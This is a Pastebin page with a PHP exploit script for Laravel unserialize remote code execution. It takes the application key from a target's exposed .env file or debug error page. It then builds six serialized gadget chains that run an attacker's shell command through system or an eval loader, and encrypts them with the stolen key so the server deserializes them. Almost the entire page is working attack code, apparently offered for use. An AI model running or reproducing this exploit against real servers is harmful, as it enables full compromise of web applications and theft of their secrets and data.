Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * @Con7ext | Laravel Unserialize
- */
- error_reporting(0);
- class Func_
- {
- public function Serialize($key, $value)
- {
- $cipher = 'AES-256-CBC'; // or 'AES-128-CBC'
- $iv = random_bytes(openssl_cipher_iv_length($cipher)); // instead of rolling a dice ;)
- $value = \openssl_encrypt(base64_decode($value) , $cipher, base64_decode($key) , 0, $iv);
- if ($value === false)
- {
- exit("Could not encrypt the data.");
- }
- $iv = base64_encode($iv);
- $mac = hash_hmac('sha256', $iv . $value, base64_decode($key));
- $json = json_encode(compact('iv', 'value', 'mac'));
- if (json_last_error() !== JSON_ERROR_NONE)
- {
- echo "Could not json encode data." . PHP_EOL;
- exit();
- }
- //$encodedPayload = urlencode(base64_encode($json));
- $encodedPayload = base64_encode($json);
- return $encodedPayload;
- }
- public function GeneratePayload($command, $func = "system", $method = 1)
- {
- $payload = null;
- $p = "<?php $command exit; ?>";
- switch ($method)
- {
- case 1:
- $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:15:"Faker\Generator":1:{s:13:"' . "\x00" . '*' . "\x00" . 'formatters";a:1:{s:8:"dispatch";s:' . strlen($func) . ':"' . $func . '";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}';
- break;
- case 2:
- $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' . "\x00" . '*' . "\x00" . 'listeners";a:1:{s:' . strlen($command) . ':"' . $command . '";a:1:{i:0;s:' . strlen($func) . ':"' . $func . '";}}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}';
- break;
- case 3:
- $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' . "\x00" . '*' . "\x00" . 'app";s:' . strlen($command) . ':"' . $command . '";s:17:"' . "\x00" . '*' . "\x00" . 'defaultChannel";s:1:"x";s:17:"' . "\x00" . '*' . "\x00" . 'customCreators";a:1:{s:1:"x";s:' .strlen($func) . ':"' . $func . '";}}}';
- break;
- case 4:
- $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:' . strlen($func) . ':"' . $func . '";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";s:' . strlen($command) . ':"' . $command . '";}';
- break;
- case 5:
- $payload = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"' . "\x00" . '*' . "\x00" . 'queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;s:4:"load";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{s:9:"' . "\x00" . '*' . "\x00" . 'config";O:35:"Mockery\Generator\MockConfiguration":1:{s:7:"' . "\x00" . '*' . "\x00" . 'name";s:7:"abcdefg";}s:7:"' . "\x00" . '*' . "\x00" . 'code";s:'. strlen($p) . ':"' . $p . '";}}}';
- break;
- case 6:
- $payload = 'O:29:"Illuminate\Support\MessageBag":2:{s:11:"' . "\x00" . '*' . "\x00" . 'messages";a:0:{}s:9:"' . "\x00" . '*' . "\x00" . 'format";O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' . "\x00" . '*' . "\x00" . 'events";O:25:"Illuminate\Bus\Dispatcher":1:{s:16:"' . "\x00" . '*' . "\x00" . 'queueResolver";a:2:{i:0;O:25:"Mockery\Loader\EvalLoader":0:{}i:1;s:4:"load";}}s:8:"' . "\x00" . '*' . "\x00" . 'event";O:38:"Illuminate\Broadcasting\BroadcastEvent":1:{s:10:"connection";O:32:"Mockery\Generator\MockDefinition":2:{s:9:"' . "\x00" . '*' . "\x00" . 'config";O:35:"Mockery\Generator\MockConfiguration":1:{s:7:"' . "\x00" . '*' . "\x00" . 'name";s:7:"abcdefg";}s:7:"' . "\x00" . '*' . "\x00" . 'code";s:' . strlen($p) . ':"' . $p . '";}}}}';
- break;
- }
- return base64_encode($payload);
- }
- }
- class Requester
- {
- public function Requests($url, $postdata = null, $headers = null, $follow = true)
- {
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- if (!empty($headers) && $headers != null)
- {
- curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
- }
- if (!empty($postdata) && $postdata != null)
- {
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
- }
- if ($follow)
- {
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- }
- $data = curl_exec($ch);
- $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
- $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
- $head = substr($data, 0, $header_size);
- $body = substr($data, $header_size);
- return json_decode(json_encode(array(
- 'status_code' => $status_code,
- 'headers' => $this->HeadersToArray($head) ,
- 'body' => $body
- )));
- }
- public function HeadersToArray($str)
- {
- $str = explode("\r\n", $str);
- $str = array_splice($str, 0, count($str) - 1);
- $output = [];
- foreach ($str as $item)
- {
- if ($item === '' || empty($item)) continue;
- $index = stripos($item, ": ");
- $key = substr($item, 0, $index);
- $key = strtolower(str_replace('-', '_', $key));
- $value = substr($item, $index + 2);
- if (@$output[$key])
- {
- if (strtolower($key) === 'set_cookie')
- {
- $output[$key] = $output[$key] . "; " . $value;
- }
- else
- {
- $output[$key] = $output[$key];
- }
- }
- else
- {
- $output[$key] = $value;
- }
- }
- return $output;
- }
- }
- class Exploit extends Requester
- {
- public $url;
- public $vuln;
- public $app_key;
- public function __construct($url)
- {
- $this->url = $url;
- $this->vuln = null;
- $this->app_key = null;
- }
- public function getAppKeyEnv()
- {
- $req = parent::Requests($this->url . "/.env", null, null, $follow = false);
- if (preg_match('/APP_KEY/', $req->body))
- {
- preg_match_all('/APP_KEY=([a-zA-Z0-9:;\/\\=$%^&*()-+_!@#]+)/', $req->body, $matches, PREG_SET_ORDER, 0);
- $this->app_key = $matches[0][1];
- }
- }
- public function getAppKey()
- {
- $req = parent::Requests($this->url, 'a=a', null, false);
- if (preg_match('/<td>APP_KEY<\/td>/', $req->body))
- {
- preg_match_all('/<td>APP_KEY<\/td>\s+<td><pre.*>(.*?)<\/span>/', $req->body, $matches, PREG_SET_ORDER, 0);
- $this->app_key = $matches[0][1];
- }
- else
- {
- $this->getAppKeyEnv($this->url);
- }
- }
- }
- function Help() {
- echo "
- url=URL // Target Required
- Optionals:
- key=APP_KEY // Setting app key if u have
- function=system // Function ex : system, passthru
- method=1 // method 1 - 4 Required function parameter, 5 - 6 ( Eval mode )
- ". PHP_EOL;
- }
Add Comment
Please, Sign In to add comment